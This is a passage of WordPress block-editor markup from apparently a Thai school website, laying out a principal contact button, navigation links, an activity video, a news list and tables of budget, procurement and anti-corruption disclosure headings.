//nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 